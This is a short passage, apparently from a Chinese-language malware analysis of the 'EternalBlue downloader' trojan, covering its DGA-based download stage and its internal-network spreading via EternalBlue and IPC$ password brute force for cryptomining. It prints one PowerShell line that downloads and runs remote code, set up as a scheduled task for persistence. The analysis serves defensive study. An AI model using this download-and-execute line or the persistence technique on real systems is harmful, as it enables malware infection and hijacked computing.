永恒之蓝下载器使用DGA域名进行攻击，多个漏洞攻击内网挖矿(2)

最后，使用该DGA域名下载后续阶段的Powershell恶意代码执行,并将该行为安装为计划任务Rsta2，实现自动运行。
iex(new-object net.webclient).downloadstring(http://[DGA]/ipco.jsp?0.3)
三、利用多个漏洞攻击内网挖矿
分析发现，当前版本的“永恒之蓝下载器”木马存在以下漏洞攻击行为：
1.利用“永恒之蓝”漏洞攻击

2.针对IPC$弱口令进行爆破攻击